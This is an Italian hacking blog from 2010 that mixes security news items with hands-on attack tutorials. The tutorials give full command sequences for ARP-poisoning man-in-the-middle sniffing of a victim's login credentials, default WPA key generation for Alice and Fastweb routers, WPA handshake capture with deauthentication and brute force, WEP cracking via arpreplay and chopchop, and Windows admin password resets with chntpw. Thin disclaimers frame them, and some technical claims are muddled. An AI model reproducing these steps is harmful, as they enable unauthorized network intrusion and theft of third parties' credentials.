venerdì 17 dicembre 2010

Ettercap Arp Poisoning HTTP SSH Password Sniffer ( For Windows/Linux )




Oggi voglio parlarvi di "Ettercap", un tool che ci permette di catturare il traffico passante fra il Gateway (router) e un PC, infatti la tecnica viene detta "Man in the middle", cioè l'uomo nel mezzo che saremo noi ^__^

In questo modo ogni traffico HTTP con protezione SSH verrà sniffato da noi, questo vuol dire che se la vittima entra su facebook, paypal, gmail o qualsiasi altro sito in cui si devono inserire delle credenziali, i suoi dati verranno catturati da noi al momento del login e noi vedremo "nome utente" e "password" della vittima.

Su Backtrack troviamo il programma già installato, se invece vogliamo usarlo su un'altra distribuzione Linux o su Windows possiamo scaricarlo dalla pagina ufficiale.

Ora non ci rimane che aprire il programma. Ci troveremo davanti ad una schermata come questa:



Per prima cosa clickate su "Sniff - Unified Sniffing" come "Network interface" mettete la vostra. Se siete collegati tramite cavo ethernet scegliete "eth0" se siete collegati tramite wifi usate "wlan0".

Come noterete il menù in alto è cambiato. Andate su "Hosts - Scan for Hosts", comparirà una barra, vuol dire che il programma sta controllando quanti dispositivi sono connessi alla rete. Ora clickate su "Hosts - Hosts list", vi comparirà una schermata con tutti gli host connessi, fra cui il "gateway" che dovrebbe essere il primo della lista e gli altri "hosts" che sono i PC connessi.

Ora selezioniamo il primo della lista e clickiamo su "Add to Target 1", poi selezioniamo il secondo IP e clickiamo su "Add to Target 2". In questo modo noi controlleremo il traffico solo tra il ruoter (Target 1) e il PC (Target 2), nel caso i PC connessi fossero più di uno allora dobbiamo selezionare solo il "Target 1" e come "Target 2" non aggiungere nulla, in questo modo il programma aggiungerà automaticamente tutti gli host presenti nella lista.

Adesso andiamo in alto nel menù e clickiamo su "Mitm - Arp Poisoning" e spuntiamo "Sniff remote connections". Sempre nel menù in alto andiamo su "Start - start sniffing".

Il programma ora inizierà a catturare tutti i pacchetti filtrando solo quelli che interessano a noi.

Se volete provare, fate un login su facebook da un altro PC connesso alla vostra stessa rete. Vedrete che, nel riquadro in basso di ettercap, compariranno "Nome utente" e "Password".



DISCLAIMER: La guida sopra descritta è al solo scopo illustrativo. Non mi ritengo responsabile dell'uso che voi possiate farne.

giovedì 16 dicembre 2010

Alice & Fastweb WPA Crack Istantaneo!




Ormai è da più di un anno che si parla del fatto che le password di default dei router alice e fastweb siano in qualche modo collegate al loro indirizzo SSID e al MAC Address.


Anche se la notizia non è più recentissima, ma avendo creato il blog da poco non ho potuto parlarvene prima, un gruppo di nome "White Hats Crew" è riuscito a scoprire cosa si celava dietro la generazione delle password di defautl! Sul loro Blog hanno postato una guida dettagliata di come funziona l'algoritmo, quindi se siete interessati ai dettagli vi rimando al loro Blog.

Successivamente un Hacker, di nome evilsocket, ha creato due semplici script in php che, dall'SSID della rete Alice o Fastweb, generano le password di default istantaneamente! Vi posto quì di seguito i Link per il download:


Per ora siamo in grado di generare le password solo dei seguenti SSID:

Fastweb:

00:08:27 Pirelli Broadband Solutions
00:13:C8
Pirelli Broadband Solutions
00:17:C2 Pirelli Broadband Solutions
00:19:3E P
irelli Broadband Solutions
00:1C:A2 Pirelli Broadband Solutions
00:1D:8B Pirelli Broadband Solutions
00:22:33 Pirelli Broadband Solutions
00:23:8E
Pirelli Broadband Solutions
00:25:53 Pirelli Broadband Solutions
00:03:6F Telsey S.p.A. (in fase di Test)
00:21:96 Telsey S.p.A.
(in fase di Test)

Alice:

  • Alice-96xxxxxx
  • Alice-93xxxxxx
  • Alice-56xxxxxx
  • Alice-55xxxxxx
  • Alice-54xxxxxx
  • Alice-48xxxxxx
  • Alice-46xxxxxx

Ora vediamo come eseguire i due script su un sistema operativo Linux, in particolare Backtrack o Ubuntu o un Sistema Ubuntu based (Linux Mint, ecc):

1- Apriamo il terminale e scriviamo questo comando:

  • "sudo apt-get install php5 php5-cli php5-mhash "
In questo modo installiamo quello che ci serve per poter eseguire lo script in php

2- Ora dobbiamo modificare lo script di fastweb o di alice a seconda della rete che abbiamo. Usiamo un editore di testi a nostra scelta (Gedit, kate, nano, ...)

Apriamo quello fastweb:



Come si vede nell'immagine, ho selezionato la parte che dobbiamo andare a modificare. Nel campo "$ssid" al posto di quello già presente, dobbiamo mettere quello della nostra rete senza togliere le virgolette ("FASTWEB-1-######")

Stessa cosa per lo script alice:



Dall'immagine si vede che, nel caso dello script alice, non basta mettere l'SSID ma serve anche il MAC Address. L'SSID lo ricaviamo facilmente visto che il nome della rete, per ricavare il MAC Address invece possiamo usare questo metodo:

Installiamo la suite "Aircrack-ng":

  • sudo apt-get install aircrack-ng
Ora mettiamo la nostra scheda wifi in modalità monitor, per fare questo dobbiamo sapere qual'è il nome della nostra interfaccia e possiamo scoprirlo usando il comando "iwconfig", solitamente il nome è "wlan0":

  • sudo airmon-ng start wlan0
Verrà creata un'interfaccia virtuale in modalità monitor di nome "mon0"

Adesso ci resta solo lanciare la scansione:

  • sudo airodump-ng  --write cap mon0
Come noterete vi dovrebbe comparire una lista con tutte le reti wifi presenti nella vostra zona con vari dettagli fra cui l'SSID e il MAC della vostra rete ALICE.

Copiate il MAC e inserito nello spazio apposito nello script. Notate che la formattazione dell'indirizzo è diversa dal solito, mantenete quella (\x00\xED\x...).


3- L'ultima cosa che dobbiamo fare è eseguire lo script che abbiamo modificato con i nostri dati. Aprite un terminale e posizionatevi nella cartella dove avete salvato gli script e scrivete:

  • php <nome_file>
Ovviamente mettete il nome del file senza le parentesi angolari ^^


Dopo aver lanciato il comando vi comparirà subito sotto la password.




DISCLAIMER: Questa è una guida al solo scopo illustrativo, non mi ritengo responsabile dell'uso che potete farne


Raoul Chiesa e Router Hacking





Diventa sempre più difficile proteggere dalle intrusioni la propria rete wi-fi casalinga. Soprattutto per gli utenti degli operatori telefonici italiani, bersaglio dell'ultima minaccia su internet: «Strumenti di hacking veloci e automatici, che funzionano via cloud computing: tutti via browser, senza bisogno di installare software» dice Raoul Chiesa, uno degli (ex) hacker più famosi d'Italia e poi fondatore di due aziende di sicurezza informatica. Impiegano pochi minuti per scovare la password delle reti wi-fi, perché sono specializzati con i router dei principali operatori italiani. Analizzano solo le combinazioni di password possibili con quei modelli di router, di cui i pirati hanno fatto un reverse engineering. «Sfruttano una particolarità italiana: i principali operatori obbligano gli utenti, su alcune offerte, a usare i propri router e non altri disponibili nei negozi» continua Chiesa. Altri strumenti web (come Wpacracker.com), che funzionano con tutti gli operatori, hanno ridotto a 20 minuti la ricerca della password perché sfruttano la potenza del cloud. Il tutto funziona se l'utente imposta una password di crittografia Wpa, sul proprio router. Se non ne mette alcuna, per i pirati il compito è più facile, perché resta la password predefinita dall'operatore. È scovabile con programmi come Wuppy.
È possibile difendersi, però. «Se l'utente imposta una password Wpa2, al pirata ci possono volere giorni per trovarla» spiega Chiesa. Per essere ancora più sicuri, ci sono stratagemmi, tutti impostabili dai menu del router: disabilitare il broadcasting dell'ssid (la funzione con cui il router dice ai computer vicini il nome della rete) e il Dhcp (protocollo di configurazione automatica degli indirizzi); attivare un filtro che consente solo ai terminali noti di accedere alla rete.
Se l'utente non ha avuto l'accortezza minima di cambiare la password principale di accesso al router, il pirata prova le password di fabbrica e s'impossessa del router. Può usarlo per intercettare dati che transitano sulla rete; stesso risultato che otterrebbe rubando la password di crittografia. Così può ottenere password dei siti web e dati personali dell'utente. Finisce nelle sue mani tutto ciò che passa su internet tramite il computer connesso al wi-fi. Si corrono questi stessi rischi se ci si connette fuori casa a reti wi-fi altrui non sicure.

Fonte: ilsole24ore

mercoledì 15 dicembre 2010

OpenBSD e le backdoor dell'FBI




Un programmatore denuncia: io e altri siamo stati pagati dai federali per inserire canali di intercettazione nascosti nel sistema operativo open source. Realtà o teoria della cospirazione?
Roma - Le backdoor dell'FBI nei software di sicurezza non sono leggende metropolitane, anzi: il bureau investigativo più famoso del mondo avrebbe effettivamente pagato valenti programmatori con lo scopo preciso di instillare "porte di accesso secondarie" all'interno di software open source, con conseguenze ramificatesi nel corso degli anni.

A scatenare una nuova tempesta di cospirazioni governative e legittime preoccupazioni per la riservatezza delle comunicazioni è il coder Gregory Perry, che rivela la presenza delle backdoor federali in una email diretta al capo del progetto OpenBSD Theo de Raadt. Perry dice di essere stato sin qui obbligato al vincolo di segretezza dal non-disclosure agreement (NDA) stretto con l'FBI, ma tale NDA è recentemente scaduto e il programmatore può dunque rivelare la verità a Raadt e alla community dell'open source.




"Volevo rendervi edotti del fatto che l'FBI ha implementato un certo numero di backdoor nei meccanismi di leaking side channel delle chiavi nel framework crittografico di OpenBSD - scrive Perry - con l'intento preciso di monitorare il sistema di cifratura VPN site-to-site implementato da EOUSA, l'organizzazione che controlla l'FBI".Le backdoor volute dall'FBI sarebbero insomma dirette soprattutto al monitoraggio della rete di amministrazione interna delle procure distrettuali, ma Perry suggerisce che le suddette backdoor rappresentino il motivo principale del "consiglio" dell'agenzia di usare OpenBSD per le comunicazioni VPN e il firewalling negli ambienti virtualizzati.

Come risponde il gestore del progetto OpenBSD alle rivelazioni di Gregory Perry? Lavandosene le mani: de Raadt dice di non voler entrare a far parte di una "simile cospirazione", e di non voler avviare alcuna indagine interna atta a scovare il codice nascosto di cui parla il programmatore.

Sarà la community a occuparsi delle opportune verifiche, dice de Raadt, verifiche che non sarebbero umanamente possibili per una singola organizzazione considerando il fatto che il codice incriminato è ora parte integrante di molti progetti e prodotti open source. Se le backdoor esistono realmente, la loro proliferazione avrebbe a questo punto raggiunto un'estensione capillare.


Fonte: punto-informatico 




Stallman: Chrome OS è per gli stupidi

Il fondatore della FSF: "Il cloud computing serve solo a far perdere il controllo sui dati".



A Richard Stallman, il fondatore della Free Software Foundation prossimamente in Italia, il cloud computing non è mai piaciuto.
È quindi abbastanza ovvio che Chrome OS, il sistema operativo che Google sta creando principalmente per i netbook e che porta al massimo il paradigma del cloud computing, non incontri il suo favore.
Stallman spiega, però, anche i motivi di questa contrarietà: "Negli USA si perde ogni diritto legale se si conservano i propri dati sulle macchine di un'azienda anziché sulle proprie".
"La polizia" - continua Stallman - "deve esibire un mandato di perquisizione per ottenere i dati da un privato; ma se i dati sono conservati sul server di un'azienda, il privato potrà non saperne mai niente".
Il fatto che con Chrome OS tutti i dati si spostino sui server di Google non può quindi andare a genio a Stallman il quale, anziché di cloud computing, preferisce parlare di careless computing (computing negligente).
Chrome OS - e tutto il cloud computing - in definitiva è per gli stupidi. "Immagino che molte persone continueranno a migrare verso il careless computing, perché ogni minuto nasce uno stupido. E il governo degli USA potrebbe incoraggiare la gente a mettere i propri dati laddove il governo stesso possa poi sequestrarli senza dover esibire un mandato".
L'unico lato positivo di Chrome OS, secondo Stallman, è che alla base ci sia GNU/Linux. "In sostanza, Chrome OS è il sistema operativo GNU/Linux. Ma è distribuito senza le solite applicazioni e manipolato in maniera tale da scoraggiare l'installazione di applicazioni".

Fonte: zeusnews

CyberWar 4 WikiLeaks



La comunità underground pro Assange si sta mobilitando in suo favore. Sono molti i sostenitori di Wikileakes. È già stato minacciato il Regno Unito di mandare in tilt il sistema, bloccando i siti del governo e segno di protesta.
L’apparato governativo britannico è già in allerta, ma ieri gli hacker hanno già dato segno della propria abilità, mettendo in rete le password di circa 1.3 milioni di utenti del sito di gossip Gawker e continuano a seminare il panico. Amazon, il più grande “dettagliatore” online, ha dichiarato che la sparizione dei suoi siti europei per circa 30 minuti avvenuta domenica è stata causa di un guasto. Considerando che proprio Amazon fu una delle compagnie accusate di aver revocato i propri servizi a Wikileaks subito dopo la pubblicazione dei file USA, il dubbio che sul blackout temporaneo ci fosse la mano degli hacker c’è, e continua ad esserci, anche perché proprio ieri una gruppo anonimo di hacker ha dichiarato di voler attaccare Amazon e di avere come obbiettivo il sito delle autorità giudiziarie svedesi e di altri governi.





“E’ iniziata una guerra informatica – hanno comunicato gli hacker –l’informazione è libera, i governi non hanno voluto divulgare alcune informazioni, Wikileaks le ha rese pubbliche, la guerra è iniziata”.

martedì 14 dicembre 2010

UNetbootin - Linux a portata di chiavetta

Nel seguente post vorrei illustrarvi come creare una "chiavetta USB" con una ditribuzione qualsiasi live di linux, in particolare Backtrack 4 r2.

Per prima cosa scarichiamoci UNetbootin da questo indirizzo http://unetbootin.sourceforge.net/, scegliete la versione in base al vostro sistema operativo.

Oltre al programma ci serve anche la ISO di Backtrack che possiamo trovare a questo indirizzo :  http://www.backtrack-linux.org/downloads/
Consiglio di scaricare tramite torrent che è molto veloce e in un oretta dovreste aver finito.

Ora prima di aprire il programma ci serve una chiavetta USB (consiglio almeno da 2 GB) formattata in FAT32, anche nel caso in cui fosse vuota consiglio in ogni caso di formattarla.

Finito il passaggio precedente, possiamo aprire il programma precedentemente scaricato.


Come si può vedere dall'immagine, ci sono 2 modi per installare una distro su una chiavetta.

  1. Possiamo selezionare "Distribution" e scegliere la versione che più ci interessa...
  2. Oppure selezionare "Disk Image" e andare a prendere la nostra ISO, in questo caso di Backtrack 4 r2, sul nostro hard disk.
Quindi, appena finito di scaricare Backtrack, selezioniamo "Disk Image" poi "ISO" e infine andiamo a inserire il percorso della posizione della nostra distro.

Ultima cosa da fare è selezionare "Type: USB Drive" e come "Drive:" la lettera che corrisponde alla nostra chiavetta formattata.

Clickate su "OK" e il gioco è fatto! Aspettate che l'installazione finisca e spegnete il computer.

Per far partire il sistema operativo (Backtrack) dalla chiavetta e non quello presente sull'hard disk, dobbiamo andare a modificare alcune impostazioni nel BIOS. Per entrare nel BIOS dovete avere il PC spento, accendete e nel mentre premete ripetutamente il tasto CANC (questo cambia da sistema a sistema, in alcuni è CANC in altri F2, in ogni caso il caro e vecchio Google ci saprà consigliare ^__^) e si vi dovrebbe comparire una schermata BLU simile a questa:


Importante: nel BIOS potete usare solo la tastiera (Freccette, INVIO, ecc)

Come potete vedere nell'immagine, in alto a destra c'è una sezione di nome "Boot", andate li e cercare qualcosa simile a "Boot device priority" e con F5-F6 spostate in prima posizione "USB HDD" o qualcosa di simile.

Ovviamente per ogni BIOS è diverso e non tutti supportano il Boot da chiavetta. Se il PC è più vecchio di 4-5 anni potreste non trovare l'opzione.

Spero di essere stato abbastanza chiaro, in ogni caso se avete qualche problema scrivete pure nei commenti.













Virus - Aumenta la durata delle Batterie




È stato scoperto, dall'Università del Maryland, un virus (questa volta non di computer) in grado di ampliare la durata di una batteria fino  a 10 volte.

Il virus, chiamato modaco, è un parassita delle piante di tabacco e non solo. 

Questo permetterà, a parità di dimensioni, di creare batteria con una durata molto maggiore oppure di dimensioni ridotte.

Se pensiamo che in media una batteria agli ioni di litio dura 4 ore , provate ad immaginare 10 volte tanto! :-) 

Quindi, speriamo presto, potremo dire addio alle doppie batterie e agli alimentatori sempre dietro per avitare di rimanere con un laptop inutilizzabile.

Fonte: zeusnews






lunedì 13 dicembre 2010

Gli hacker rubano i dati dei clienti di McDonald's

McDonald´s sta lavorando con le forze dell´ordine dopo che degli hacker sono entrati nella banche dati di un´altra società e hanno rubato le informazioni di un numero imprecisato di clienti della catena di fast food.
McDonald´s ha avvertito i clienti, a cui sono stati potenzialmente rubati i dati, sia via e-mail che attraverso un messaggio sul sito di McDonald´s.

Fonte: http://www.hwstation.net

Attacco hacker a Gawker.com: rubate milioni di password

Rubate numerose password utente, probabilmente nell'ordine dei milioni, con un attacco hacker ai danni di Gawker.com. La società consiglia di modificare le password, soprattutto se utilizzate per altri servizi. Gawker è la società che pubblica anche Gizmodo, il sito web che a maggio pubblicò le prime immagini dell'iPhone 4 smarrito dall'ingegnere di Cupertino. 

 Fonte : http://www.macitynet.it

Facebook istituisce una coppa per gli Hacker

Si arruolano hacker su Facebook, ma questa volta non c'entrano né gli amici né i nemici di Wikileaks. Il social network lancia dal prossimo 20 dicembre la Hacker Cup, una competizione internazionale aperta a tutti gli sviluppatori di software nel mondo. Il premio in denaro non è esorbitante, 5.000 dollari al primo classificato e, rispettivamente, 2.000 e 1.000 al secondo e al terzo, ma quel che farà più gola agli hacker di tutto il globo sarà l'accesso ai sancta sanctorum dell'informatica statunitense, e la possibilità di far mostra di sé davanti alle teste d'uovo della Silicon Valley.

Fonte: http://www.lastampa.it

Wikileaks, i DDos non sono così anonimi

L'arresto del sedicenne olandese accusato di aver partecipato agli attacchi contro i siti di Mastercard e Visa l'ha dimostrato: non è saggio improvvisarsi pirati informatici.
L'Università di Twente, nei Paesi Bassi, ha infatti pubblicato un breve studio in cui mostra come chi intenda intraprendere questo genere di attività non può limitarsi a utilizzare uno strumento preconfezionato, ma dovrebbe attivamente pensare a proteggersi.
Il Low Ion Orbit Cannon - lo strumento utilizzato per sferrare gli attacchi DDoS, da solo non fornisce i mezzi per rendersi anonimi: per questo motivo i pirati più "seri" utilizzano sistemi anonimizzanti come TOR per evitare di rendere pubblico il proprio indirizzo IP.
I ricercatori dell'Università di Twente paragonano l'utilizzo di LOIC dal proprio computer a inondare la cassetta della posta di qualcuno con migliaia di lettere, ognuna delle quali porta ben chiaro l'indirizzo del mittente.
Né si può sentire al sicuro chi finora - ad attacchi conclusi - non è ancora stato rintracciato dalle forze dell'ordine: per legge gli ISP devono conservare i dati di connessione dei loro utenti per sei mesi. C'è dunque ancora tempo perché la polizia possa suonare al campanello di questi "pirati della domenica".

Fonte:  http://www.zeusnews.it

Microsoft, 17 bollettini per l'ultimo patch Tuesday del 2010

Martedì prossimo Microsoft rilascerà gli ultimi aggiornamenti del 2010 per i propri prodotti.
Per l'occasione l'azienda ha preparato la bellezza di 17 bollettini di sicurezza che riguardano 40 vulnerabilità in tutti i sistemi operativi supportati e in tutte le versioni di Office supportate.
Due di questi bollettini sono classificati come critici, quattordici importanti e uno moderato

Fonte: http://www.zeusnews.it/

Automated WEP & WPA script!

Ho da poco trovato questi due interessantissimi script per Linux che, a quanto pare, permettono di craccare reti WEP e WPA (Tramite brute force) in automatico lanciando un semplice script!




Ringrazio il forum di backtrack e il creatore dello script

Backtrack “Cambiare Password Admin”



Oggi parliamo di come cambiare la password di un Admin su un sistema Windows XP/Vista.
Per prima cosa dobbiamo smontare la nostra partizione di Windows nel mio caso “hde1″ (per sapere in quale partizione è il Sistema Operativo, usare konqueror… la stringa sarà simile a “media: hde1″):
  • umount /dev/hde1
Adesso dobbiamo creare una cartella in cui montare successivamente la nostra partizione di windows:
  • mkdir /mnt/win
Ora montiamo nella cartella win la partizione contenente il SO:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win
Se il precedente comando restituisce un errore provare con:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win -o force
Ora, grazie al programma chntpw, possiamo vedere la lista degli utenti presenti nel SO e fare le modifiche che preferiamo:
  • chntpw -i /mnt/win/WINDOWS/system32/config/SAM
Una volta che abbiamo la lista degli utenti possiamo modificare quello che vogliamo cambiando il nome “fittizio” con il nome dell’utente:
  • chntpw -u fittizio /mnt/win/WINDOWS/system32/config/SAM
Nel caso la password fosse “Blank” si può provare a cancellare la password usando un’altra opzione con il comando chntpw -i /mnt/win/WINDOWS/system32/config/SAM

WPA/WPA2 'Brute Force' Crack



Oggi parleremo di come cracckare una rete protetta da cifratura WPA o WPA2.
Il metodo è simile a quello usato per le reti WEP, con la differenza che qui abbiamo bisogno di un “Dizionario” (word list). Analizzando la rete dobbiamo catturare l’HANDSHAKE appartenente a quella rete e usare la FORZA BRUTA per trovare la PASSWORD.
In cosa consiste questa BRUTE FORCE? In pratica una volta trovato questo HANDSHAKE noi proviamo tutte le parole/lettere/numeri   presenti nella nostra WORDLIST in modo da trovarne la PSK (pre shared key).
E’ facile capire che se noi abbiamo una wordlist da 10.000.000 di parole e la nostra password è alla fine di questa lista, ci vorrà molto tempo prima di trovare la password corretta. Solitamente un dual core può analizzare circa 300-400 pass al secondo. A questo problema ci viene in contro la nuova tecnologia CUDA di nVidia che permette di sfruttare la potenza di calcolo della nostra GPU (della scheda video), ma di questo ne parleremo in un altro articolo.
Dopo questa premessa, la prima cosa da fare per craccare una WPA/WPA2 è avere una buona WORDLIST. Queste si possono reperire molto facilmente su internet (GOOGLE) oppure è possibile crearsene una personale, ma anche di questo ne parleremo in un altro articolo.
Adesso che abbiamo la nostra wordlist, possiamo cominciare con il vero divertimento:


1) Mettiamo la nostra scheda wifi in monitor mode
sudo airmon-ng start wlan0

-wlan0 è l’interfaccia wifi  (usare iwconfig da terminale per vedere la propria)
Molto probabilmente verrà creata un’interfaccia mon0 al posto di wlan0,  noi useremo sempre mon0 dopo questo passaggio.

2) Ora tramite la monitor mode possiamo scansionare la rete in cerca di AP con protezione WPA/WPA2
sudo airodump-ng –write cap mon0

-   –write crea dei pacchetti cap.cap
- mon0 è l’interfaccia wlan0 in monitor mode
In questo modo possiamo vedere tutte le reti presenti nelle vicinanze e scegliere il nostro bersaglio.

3) Ora concentriamoci sul nostro obiettivo:
sudo airodump-ng -c [canale AP] –bssid [MAC AP] –write cap mon0

Uguale a prima, ma in questo modo analizziamo solo i pacchetti di un singolo AP. La rete deve essere PSK (pre shared key) altrimenti non è possibile usare il brute force e quindi non è possibile tentare di craccarla.

4) Usare aireplay-ng per  deautenticare il client connesso
aireplay-ng -0 5 -a [MAC AP] -c [MAC mia scheda] mon0

-0 è il  deauthentication mode
-5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
Terminato questo comando, nella SHELL dove abbiamo eseguito il punto 3, dovremo vedere comparire il alto a destra “HANDSHAKE”, se questo non compare non possiamo cracckare la rete.

5) Avviare  aircrack-ng per recuperare la  pre-shared key
aircrack-ng -w [dizionario] -b [MAC AP] cap*.cap

-w dizionario è il nome del file dizionario
-  *.cap è il l’lenco dei file di capture che abbiamo collezionato
Se tutto è andato a buon fine avremo come risultato un bellissimo KEY FOUND!

Spesso capita di non riuscire a trovare l’HANDSHAKE, questo può essere dovuto al fatto che per poterlo catturare è necessario essere nella stessa modalità (a/b/g/n) e averete lo stesso rate di dati dell’AP. Possiamo risolvere questo problema provando diverse modalità e diversi rate:

6) Cambiare il rate
iwconfig ath0 rate [auto,1M,2M,5.5M,6M,9M,11M,18M,24M,36M,48M,54M]

A volte la soluzione migliore può essere provare subito  1M  come rate.

7) Cambiare la modalità
iwpriv ath0 mode 2

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

Per ulteriori chiarimenti o suggerimenti sull’articolo scrivetemi pure.

ThePirateBay Italia censura



Come molti di voi avranno notato, il sito “The Pirate Bay” è stato oscurato negli ultimi giorni. In poche parole noi Italiani non possiamo più accedere a una delle più famose comunità di condivisione di file .torrent . Questa volta il blocco è stato fatto a livello IP.
Ovviamente a questo problema c’è un rimedio, anche molto semplice.
La soluzione è usare un PROXY… Cos’è un PROXY? è un programma che si interpone fra client (cioè noi) e server ( cioè il sito a cui ci vogliamo collegare). In pratica la nostra richiesta, di accedere al sito, viene mandata ad un server in un altro stato ( ad es. USA o altri) e poi da questo server al sito che vogliamo visitare. In questo modo è come se ci trovassimo negli USA, o in un altro stato a seconda della posizione del PROXY. E se noi accediamo dagli USA al sito, siccome negli USA “The Pirate Bay” non è censurato, possiamo navigare tranquillamente.
L’unico difetto di usare un PROXY è che la navigazione risulterà più lenta, ma almeno sarà possibile visualizzare la pagina senza problemi.
Ora, dopo aver dato qualche delucidazione, spiegherò come usare un PROXY.
Ci sono due modi, usare un programma oppure un sito. Nel nostro caso useremo il sito che è più veloce e immediato.
  1. Andiamo sul sito proxy.org
  2. Sulla destra, alla voce “Enter a URL to visit:”, inseriamo l’indirizzo del sito che nel nostro caso è  http://thepiratebay.org/
  3. Nella lista selezioniamo un server proxy a cui collegarci, che non sia in Italia! Quelli verdi sono i più veloci.
  4. Clickiamo su GO e il gioco è fatto!
La pagina si caricherà normalmente con qualche pubblicità in più del normale. Sono solo gli sponsor che il server usa per poter sopravvivere e permettere a noi di usarlo gratuitamente.

ABBASSO LA CENSURA

ABBASSO LA CENSURA


WEP crack ‘--arpreplay’ '--chopchop’


PREREQUISITI:
  1. Avere una distribuzione Linux based
  2. conoscenze minime dei sistemi Unix
  3. aver installato la suite di tool aircrack-ng
In questo articolo parlerò di come cracckare una rete WEP tramite il sistema PTW in due metodi:

1) arpreplay
2) chopchop




METODO ‘ARPREPLAY’

a) Per prima cosa dobbiamo sapere il nome della nostra interfaccia di rete wifi. Usiamo il seguente comando:
  • iwconfig
Solitamente il nome è del tipo ‘wlan0′.

b) Ora dobbiamo mettere la scheda in modalità monitor:
  • sudo airmon-ng start wlan0
Può capitare che, dopo aver lanciato il comando, venga creata in interfaccia virtuale di nome ‘mon0′… questa è quella che dovrete utilizzare quì di seguito. Nel caso questo non avvenga dovrete usare ‘wlan0′.

c) Ora dobbiamo fare una scansione delle reti presenti nelle vicinanze:
  • sudo airodump-ng –write cap mon0
–write = scrive nel file cap.cap
mon0 = è l’interfaccia di rete

In questo modo verranno scritte nel file cap.cap tutte le informazioni catturate.

d) Ora dobbiamo concentrarci sulla nostra rete bersaglio in modo da catturare escusivamente i file di quella rete:
  • sudo airodump-ng -c [canale AP] -b [MAC address] -w cap mon0
-c  = dobbiamo mettere il canale dell’AP
-b   = quì mettiamo il MAC dell’AP da cracckare
-w = scrive sempre sul file cap.cap
mon0 =   è l’interfaccia di rete
Ora, l’unico modo per cracckare una rete è avere un grosso quantitativo di pacchetti da poter analizzare.  Solitamente una rete non ha un grosso quantitativo di pacchetti come traffico, almeno che l’utente attaccato non stia usando la rete per qualche motivo. Ma in ogni caso ci vorrebbe molto tempo (provare per credere).

e) Il nostro scopo è di catturare 5000-10000 ‘DATA’ per una WEP 64 bit, 15000-20000 per una WEP 128 bit.
Quindi useremo il seguente comando:
  • aireplay-ng –arpreplay -b [BSSID AP] -h [MAC STATION] [nome interfaccia]
-b   = il MAC dell’AP
-h = il MAC collegato a quell’AP che viene indicato in basso accanto al MAC dell’AP sotto la voce ‘STATION’
-[nome interfaccia] =  la solita mon0
Come vedete stiamo usando il metodo ‘arpreplay’. Il metodo appena descritto è detto ‘packet injection’. Non tutte le schede supportano l’injection. Anche se ormai sono poche.

f) Appena avremo raggiunto i pacchetti (DATA) necessari dovremo lanciare il seguente comando:
  • aircrack-ng -z -b [BSSID AP] [nome dei file catturati]*.cap
-z =tipo di attacco
-b =  MAC  dell’AP
-[nome dei fiel catturati]*.cap    nel nostro caso sarà   ‘cap*.cap’ … l’asterisco sta per tutti i file cap
Nel caso i pacchetti non fossero abbastanza, comparirà un messaggio del tipo : “Try at 5000 IVS”
In questo caso non fate nulla, lasciate andare avanti la cattura dei pacchetti e appena saranno raggiunti i necessari richiesti, il programma ripartirà automaticamente.
Il messaggio di successo sarà :   KEY FOUND! [XX:XX:XX:XX:XX]       dove al posto delle X ci sarà la password dell’AP.  Possiamo inserire direttamente la password togliendo i due punti, quindi   XXXXXXXXXX.




METODO ‘CHOPCHOP’

Ora ripetiamo i punti a), b), c), d) della precedente parte.
In questo caso non dobbiamo usare la ‘STATION’ abbinata all’AP scelto, ma dobbiamo associare il MAC della nostra scheda all’AP in questo modo:
  • aireplay-ng -1 0  -a [MAC AP] -h [MAC mia scheda] mon0
-1 = metodo per l’autentificazione
-a = il MAC dell’AP
-h = il MAC della nostra scheda
mon0 = interfaccia scheda
Ora, sempre usando il tool ‘aireplay-ng’, dobbiamo catturare i pacchetti:
  • aireplay-ng -4  -b [MAC dell'AP] -h [MAC mia scheda] mon0
-4 = metodo di attacco chopchop
-b = MAC dell’AP
-h = MAC della mia scheda
mon0 = interfaccia come sempre
Ora dobbiamo creare un pacchetto per la richiesta di ARP con il toll packetforge-ng:
  • packetforge-ng -0 -a [MAC dell'AP] -h [MAC mia scheda] -k 255.255.255.255 -l 255.255.255.255.255 -y [nome].xor -w [nome pacchetti]
-0 = crea i pacchetti ARP
-a = MAC dell’AP
-h = MAC mia scheda
-k = IP di destinazione
-l = source IP
-y = legge i PRGA dal file creato con aireplay-ng
-w = crea il file .cap
Ora dobbiamo eseguire il packet injection sfruttando i pacchetti catturati in precedenza (si raccomanda di usare sempre lo stesso nome dei pacchetti catturati per evitare di fare confusione):
  • aireplay-ng -2 -r [nome file] ath0
-2 = interactive frame selection (injection)
-r = qui dobbiamo mettere il nome del file creato precedentemente con -w
Ora non ci resta che analizzare i pacchetti catturati per trovare la password:
  • aircrack-ng -P 2 -b 00:18:F6:AC:11:13 [nome file]*.cap
-P = PTW debug
2 = PTW
-b = MAC dell’AP
[nome file] = al posto di questo dobbiamo mettere il nome dei file catturati con -w
E come prima il risultato sarà:  KEY FOUND! XX:XX:XX:XX:XX  e la password è  senza i due punti.
In caso di errori, suggerimenti o altro commentate!
DISCLAIMER:  i metodi precedentemente descritti sono assolutamente illegali nel caso siano usati su reti non proprie o senza il consenso del proprietario. Non mi prendo nessuna responsabilità dell’uso di questa guida. Questa è esclusivamente a scopo informativo!

WarDriving

Che cos’è il ‘WarDriving’?  Il wardriving è una delle tecniche più utilizzate per mappare le reti presenti in una zona, città, paese. Consiste nell’andare in giro in bici, in macchina o qualunque altro mezzo, e registrare, tramite un dispositivo GPS, le reti della zona scelta; In modo da avere una mappa, ad esempio su google earth, di tutte le reti wifi presenti nella zona.
Solitamente il mezzo più usato è la bici. Il motivo è semplice… Andando in macchina, anche se meno faticoso, con velocità superiori a 30-40 Km/h, si rischia sicuramente di non mappare qualche rete.
I programmi più famosi, usati per sniffare la rete, sono


Questi programmi vengono abbinati spesso con ‘google earth’, in modo da avere una chiara e precisa visione della posizione degli AP (=access point).



Esempio di wardriving su google maps:


Finita la nostra mappatura sarà possibile vedere quali fra questi AP è protetto o meno da una chiave di cifratura (WEP, WPA, WPA2). In questo modo è possibile vedere se è presente, ad esempio, un free internet point a cui potersi collegare.
Questa tecnica di ‘wardriving’ viene anche usate dai ‘Crackers’(Hackers black hat) per avere un’idea delle reti presenti nella zona e per poter sfruttare le vulverabilità e entrare in possesso di dati sensibili di privati o aziende poco furbe…
